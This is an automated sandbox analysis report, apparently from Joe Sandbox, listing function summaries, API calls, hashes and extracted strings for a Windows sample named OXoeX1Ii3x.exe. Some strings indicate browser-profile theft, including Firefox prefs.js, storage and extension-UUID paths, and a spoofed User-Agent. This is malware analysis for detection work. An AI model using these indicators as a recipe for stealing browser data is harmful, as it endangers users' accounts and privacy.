                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8815d7a6bedc7f397a209a7343cc6598465bacd9e5e93cf7cb9a8ba18a1661
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A01203210AB116EE7142778BC896272768EB22374734033EF534555F1EF664D71D2C8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0014CBAD
                                                                                                                                                                                                  • Part of subcall function 0014DF81: __EH_prolog3.LIBCMT ref: 0014DF88
                                                                                                                                                                                                  • Part of subcall function 0014FC37: __EH_prolog3.LIBCMT ref: 0014FC3E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                • String ID: '$; expected $syntax error $unexpected
                                                                                                                                                                                                • API String ID: 431132790-3930586041
                                                                                                                                                                                                • Opcode ID: 44bd6c1a05e0506db95bc0abf7163e053ffd043f37c938bc6efa70bdffb40746
                                                                                                                                                                                                • Instruction ID: a7f90b8e7abedea9fc1b4894bf25732dcbd93f1121c06c121049588d3f1551a8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 44bd6c1a05e0506db95bc0abf7163e053ffd043f37c938bc6efa70bdffb40746
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19319DB0D45209EBDF08EFA4C596AEEBF74AF24300F51406DE009AB292DB705B46CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • C:\Users\user\Desktop\OXoeX1Ii3x.exe, xrefs: 0016FE14
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                                • API String ID: 0-110836289
                                                                                                                                                                                                • Opcode ID: 98e5b0b8345338e911255b0c555e3a756e6c39ff4bca9548dda5685324bea8da
                                                                                                                                                                                                • Instruction ID: adcc23ac9bf55288b6a360d5599514d10cdf5479e60494d84c0eff46ea91e202
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98e5b0b8345338e911255b0c555e3a756e6c39ff4bca9548dda5685324bea8da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21C672A0020AAFCB10AF65ED4196B7BA9FF11364712453CF81597662E732EC7287A0
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4B460E4E,00000000,?,00000000,00185794,000000FF,?,0016C15C,?,?,0016C130,00000000), ref: 0016C1B5
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0016C1C7
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00185794,000000FF,?,0016C15C,?,?,0016C130,00000000), ref: 0016C1E9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                • Opcode ID: c8773dfb6b415e3e7d51ab5209b09a7c227dcb9d99e79654922a01f7a34a0bae
                                                                                                                                                                                                • Instruction ID: ceaca6adfa3240ede8a484106c57b587d1176da9a309cbbe19c7f43d0b799a26
                                                                                                                                                                                                • Opcode Fuzzy Hash: c8773dfb6b415e3e7d51ab5209b09a7c227dcb9d99e79654922a01f7a34a0bae
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB016D31A00659EFDB119B54DC09BBEBBB9FB48B11F044529F821E2691DB789A40CF90
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0017530A
• __alloca_probe_16.LIBCMT ref: 001753D3
• __freea.LIBCMT ref: 0017543A
  • Part of subcall function 0017188C: RtlAllocateHeap.NTDLL(00000000,?,?,?,001414D8,00000000,?), ref: 001718BE
• __freea.LIBCMT ref: 0017544D
• __freea.LIBCMT ref: 0017545A
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: ea566673079a88a9917013386b937b02f8ac811d9896fcf37e02bcf079a2a927
• Instruction ID: 7a9ffbd125ddcee69001b9bda00674f1eed611ecb168f260de903ea90ae285d6
• Opcode Fuzzy Hash: ea566673079a88a9917013386b937b02f8ac811d9896fcf37e02bcf079a2a927
• Instruction Fuzzy Hash: BE51D272600606AFEF205FA4CC81EBB3ABAEF54755B298028FD0DD6151FBB0DD90C660
APIs
• __EH_prolog3_GS.LIBCMT ref: 0015B63E
• std::_Lockit::_Lockit.LIBCPMT ref: 0015B64B
  • Part of subcall function 0015A4EA: __EH_prolog3_GS.LIBCMT ref: 0015A4F1
  • Part of subcall function 0015A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0015A502
  • Part of subcall function 0015A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0015A524
• std::_Facet_Register.LIBCPMT ref: 0015B69E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0015B6C8
• Concurrency::cancel_current_task.LIBCPMT ref: 0015B6D5
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2687776920-0
• Opcode ID: 166ea88bb5c837391ae695b38db6739d9aef62d386ba83d807d056582ad7bf69
• Instruction ID: 142b82a3228506bfe5083c2ba28600c530304785602fde7048c4f62307d28c47
• Opcode Fuzzy Hash: 166ea88bb5c837391ae695b38db6739d9aef62d386ba83d807d056582ad7bf69
• Instruction Fuzzy Hash: 5421F131908205CFCB15EFA8D5916AEB7F1EF54322F64811DE865AB2A0DB309E468B80
APIs
• __EH_prolog3_GS.LIBCMT ref: 0015C3F9
• std::_Lockit::_Lockit.LIBCPMT ref: 0015C406
  • Part of subcall function 0015A4EA: __EH_prolog3_GS.LIBCMT ref: 0015A4F1
  • Part of subcall function 0015A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0015A502
  • Part of subcall function 0015A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0015A524
• std::_Facet_Register.LIBCPMT ref: 0015C459
• std::_Lockit::~_Lockit.LIBCPMT ref: 0015C483
• Concurrency::cancel_current_task.LIBCPMT ref: 0015C490
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2687776920-0
• Opcode ID: 6d05f1de99d1c26048e466b5c3e8c0fa681f2f6a79a2b16b389f8a4796b2a7cc
• Instruction ID: 2772d1ab627a549c000e88f2e9a5db641779848875bee1c939ac6ef3478f7abc
• Opcode Fuzzy Hash: 6d05f1de99d1c26048e466b5c3e8c0fa681f2f6a79a2b16b389f8a4796b2a7cc
• Instruction Fuzzy Hash: F2110630901209CFCB05EFA49591ABEB7B1AF54712F64411DE921AF2D1CB745E4A8BD1
APIs
• __EH_prolog3.LIBCMT ref: 0015DE2B
• std::_Lockit::_Lockit.LIBCPMT ref: 0015DE36
• std::_Lockit::~_Lockit.LIBCPMT ref: 0015DEA4
  • Part of subcall function 0015DF87: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0015DF9F
• std::locale::_Setgloballocale.LIBCPMT ref: 0015DE51
• _Yarn.LIBCPMT ref: 0015DE67
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: 653fb7d62464e805adc1d8ef59e47075e0c09b68c9a50b24f698b369eb3a4366
• Instruction ID: a4da19bc2d20cc2744404ef5b9b43c14128198031e747030ed5042da31a37b68
• Opcode Fuzzy Hash: 653fb7d62464e805adc1d8ef59e47075e0c09b68c9a50b24f698b369eb3a4366
• Instruction Fuzzy Hash: 91017175A00515DBC716EB20E84697D77B1FFA4742B54404EED125B382CF746A4ACBC2
APIs
• __EH_prolog3_GS.LIBCMT ref: 001495BC
  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
  • Part of subcall function 0014B4BA: __EH_prolog3.LIBCMT ref: 0014B4C1
  • Part of subcall function 0014B64E: __EH_prolog3.LIBCMT ref: 0014B655
  • Part of subcall function 00149983: __EH_prolog3_GS.LIBCMT ref: 0014998D
  • Part of subcall function 00146B3E: __EH_prolog3_GS.LIBCMT ref: 00146B48
  • Part of subcall function 00146B3E: lstrlenA.KERNEL32(?,?), ref: 00146C2D
  • Part of subcall function 00146B3E: GetProcessHeap.KERNEL32 ref: 00146C6A
  • Part of subcall function 0014B51E: __EH_prolog3.LIBCMT ref: 0014B525
  • Part of subcall function 0014B614: __EH_prolog3.LIBCMT ref: 0014B61B
• Sleep.KERNEL32(00000BB8), ref: 0014990F
  • Part of subcall function 00148D6A: __EH_prolog3_GS.LIBCMT ref: 00148D74
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3$H_prolog3_$HeapProcessSleeplstrlen
• String ID: /Up/b$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
• API String ID: 3276473106-2390619756
• Opcode ID: 9e3b35788bcb1ca4322ca263d0b5d570b34f9301229f79dbf135d67cf1e41089
• Instruction ID: 6ffd17a42a77b48df70016a29f19178d12d8051c119893fa022fcbfd3b2542ad
• Opcode Fuzzy Hash: 9e3b35788bcb1ca4322ca263d0b5d570b34f9301229f79dbf135d67cf1e41089
• Instruction Fuzzy Hash: 0CA1BE319002599BCF18EB64CC86AEEBB75AF25310F5481ADE449A71E2DF305F8ACF51
APIs
• __EH_prolog3_GS.LIBCMT ref: 00147FAD
  • Part of subcall function 0014B4BA: __EH_prolog3.LIBCMT ref: 0014B4C1
  • Part of subcall function 00147DEC: __EH_prolog3_GS.LIBCMT ref: 00147DF3
  • Part of subcall function 00147DEC: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00147FEA), ref: 00147E40
  • Part of subcall function 00147DEC: HeapFree.KERNEL32(00000000,?,?,?,?,?,00147FEA), ref: 00147E47
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_Heap$FreeH_prolog3Process
                                                                                                                                                                                                • String ID: \Ext\$\prefs.js$\storage\default\
                                                                                                                                                                                                • API String ID: 4110124055-721971596
                                                                                                                                                                                                • Opcode ID: 6510c7f99e92dc43b00bf21750f5fa04918f2373b55a5cce8f122f3cf98a23ca
                                                                                                                                                                                                • Instruction ID: 0438abc208828300e90328ac21d9eea858a14a2980d08de231469555ae74359d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6510c7f99e92dc43b00bf21750f5fa04918f2373b55a5cce8f122f3cf98a23ca
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF919030D14288EADF05EBB4C996BEDBBB4AF25300F9440E8E105A71A2DF745F49CB52
APIs
• __EH_prolog3_GS.LIBCMT ref: 00147DF3
  • Part of subcall function 0015AE24: __EH_prolog3_GS.LIBCMT ref: 0015AE2E
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00147FEA), ref: 00147E40
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00147FEA), ref: 00147E47
  • Part of subcall function 0014A6BD: __EH_prolog3.LIBCMT ref: 0014A6C4
Strings
• user_pref("extensions.webextensions.uuids", ", xrefs: 00147E5D
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_Heap$FreeH_prolog3Process
• String ID: user_pref("extensions.webextensions.uuids", "
• API String ID: 4110124055-3221024688
• Opcode ID: 5199d80c473e97fd21925fb20e3e66bcd082600c876752c5a9dec156cb29bd19
• Instruction ID: 537aaca04cdf09595c9600795095ddbea208520b83463cd85ca313456afb027c
• Opcode Fuzzy Hash: 5199d80c473e97fd21925fb20e3e66bcd082600c876752c5a9dec156cb29bd19
• Instruction Fuzzy Hash: DA51B371D04248DFCF01EBB8C985BEEBBB4AF18300F608119E511B7292D7749B49CBA2
APIs
• __EH_prolog3_GS.LIBCMT ref: 0014998D
  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
  • Part of subcall function 0015ABF2: __EH_prolog3_GS.LIBCMT ref: 0015ABF9
  • Part of subcall function 0015ABF2: ctype.LIBCPMT ref: 0015ACB5
  • Part of subcall function 0014B7BF: __EH_prolog3.LIBCMT ref: 0014B7C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3H_prolog3_catch_ctype
• String ID: 17586936307509717578$@$ntdll.dll
• API String ID: 2848298560-3853183820
• Opcode ID: d09bf49e34d78e11562e56b6fcfb7374c0bf9052c163a5e989ae624d148c4a97
• Instruction ID: 945cbe301d590ba84479628a5d9b8c91f3a77bee1d38bff7e4c36bf7b23eb851
• Opcode Fuzzy Hash: d09bf49e34d78e11562e56b6fcfb7374c0bf9052c163a5e989ae624d148c4a97
• Instruction Fuzzy Hash: 84213CB1D01358DBCB00EFE4C886ACDBBB4AF18310F54416AE554FB292DB705A45CFA1
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,001634E8,00000000,?,0019A8FC,?,?,?,0016368B,00000004,InitializeCriticalSectionEx,00188594,InitializeCriticalSectionEx), ref: 00163544
• GetLastError.KERNEL32(?,001634E8,00000000,?,0019A8FC,?,?,?,0016368B,00000004,InitializeCriticalSectionEx,00188594,InitializeCriticalSectionEx,00000000,?,001632D2), ref: 0016354E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00163576
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: 1192cb7f90d361e81d4c4a57d17fb990da74d26ff6b368843d1dfd569f2b737e
• Instruction ID: f1672f45fdeb64505f01e44f8bea6d12df62de490fdfcc8f400cca4af2e13327
• Opcode Fuzzy Hash: 1192cb7f90d361e81d4c4a57d17fb990da74d26ff6b368843d1dfd569f2b737e
• Instruction Fuzzy Hash: C5E04F31A80308F7EF211FA1EC0AB683E65BB10B51F105430F91EE94E2EB719B608B84
APIs
• GetConsoleOutputCP.KERNEL32(4B460E4E,00000000,00000000,?), ref: 0017039B
  • Part of subcall function 0017657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00175430,?,00000000,-00000008), ref: 001765DD
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001705ED
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00170633
• GetLastError.KERNEL32 ref: 001706D6
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: 2dde465259554c60ed090385f5f5cfc322b41c3befbedd847166e7444effc12f
• Instruction ID: 35574c2bde33bd47fb732b78d4382beda7d8ba0e44113d51eade4ffdabaf365f
• Opcode Fuzzy Hash: 2dde465259554c60ed090385f5f5cfc322b41c3befbedd847166e7444effc12f
• Instruction Fuzzy Hash: 23D169B5D04248DFCF16CFA8C8909ADBBB5FF49314F24812AE45AEB351D730A992CB50
APIs
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 0ff31c5ec9675d5d47ca7420a6342a1ef7cc89672904df2034653c58e669f0a2
• Instruction ID: cb7e63e58490b822aca630e4241080c2cd135e038e5cc3fd80c6512814ff4f61
• Opcode Fuzzy Hash: 0ff31c5ec9675d5d47ca7420a6342a1ef7cc89672904df2034653c58e669f0a2
• Instruction Fuzzy Hash: 9D51E371A01A02AFEB398F14DD55BBAB3B4EF14315F24842DED16472A1E731ECA0DB90
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9f7b762ea0a8796d0f6acb0df531898cf52811d35207f916845a741ecbd32ee
• Instruction ID: ea2fcbd55d2a7b2e10e896d581f3715afa05b7a2c4f00c08e55646eac7189370
• Opcode Fuzzy Hash: a9f7b762ea0a8796d0f6acb0df531898cf52811d35207f916845a741ecbd32ee
• Instruction Fuzzy Hash: C741EBB2A00704AFD7249F38DC52B9EBBF9EB99710F10C52AF419DB281D7759A428790
APIs
  • Part of subcall function 0017657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00175430,?,00000000,-00000008), ref: 001765DD
• GetLastError.KERNEL32 ref: 0017558C
• __dosmaperr.LIBCMT ref: 00175593
• GetLastError.KERNEL32(?,?,?,?), ref: 001755CD
• __dosmaperr.LIBCMT ref: 001755D4
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 7280f7730db21db78bf30ea35ff8971a0e77d6ab2321572e30405c2711e6b39b
• Instruction ID: 8e5e3993cce5f681e1dc43c45d508d82532867408405dd9271e3c60cd86ec731
• Opcode Fuzzy Hash: 7280f7730db21db78bf30ea35ff8971a0e77d6ab2321572e30405c2711e6b39b
• Instruction Fuzzy Hash: EC219271600A05AFDB10AF66CC9196BB7BBFF24364711C528F81D97250DBB2ED509BA0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00176627
  • Part of subcall function 0017657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00175430,?,00000000,-00000008), ref: 001765DD
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0017665F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0017667F
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: ed8d4de38b61a8313895a0cce2a6034686c924a9743f8084f95712d720a1fdf9
• Instruction ID: c7b3b43369ac515e4d1a4083ae2b1c1a1c498432903517dce702dc5c946b77eb
• Opcode Fuzzy Hash: ed8d4de38b61a8313895a0cce2a6034686c924a9743f8084f95712d720a1fdf9
• Instruction Fuzzy Hash: 5411C0B2901A15BEAB1227B59C8ECAF697CDF993D83608128FC0D92101FB35DE4046B9
APIs
Similarity
• API ID: Func_class$H_prolog3
• String ID:
• API String ID: 3413606670-0
• Opcode ID: 97704eab994baf34e215bee576684a3c3728260918d3f526c41efb83bb7304b9
• Instruction ID: d0cea862c74103f716a78133557e74eb2278caa187c3a1570a5019f44a9aa6bb
• Opcode Fuzzy Hash: 97704eab994baf34e215bee576684a3c3728260918d3f526c41efb83bb7304b9
• Instruction Fuzzy Hash: 72214C70906288DFCF01DFA8C5946DDBBF8BF28304F6540ADE805A7252DB749B49CB96
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000), ref: 0017E44E
• GetLastError.KERNEL32(?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000,?,?,?,00170CCD,?), ref: 0017E45A
  • Part of subcall function 0017E420: CloseHandle.KERNEL32(FFFFFFFE,0017E46A,?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000,?,?), ref: 0017E430
• ___initconout.LIBCMT ref: 0017E46A
  • Part of subcall function 0017E3D6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0017E405,0017B28E,?,?,0017072A,?,00000000,00000000,?), ref: 0017E3E9
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000,?), ref: 0017E47F
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: b74da0006d2b9eb88b22b94e661f24eac192464dd268b17aefa4fabd8b11d209
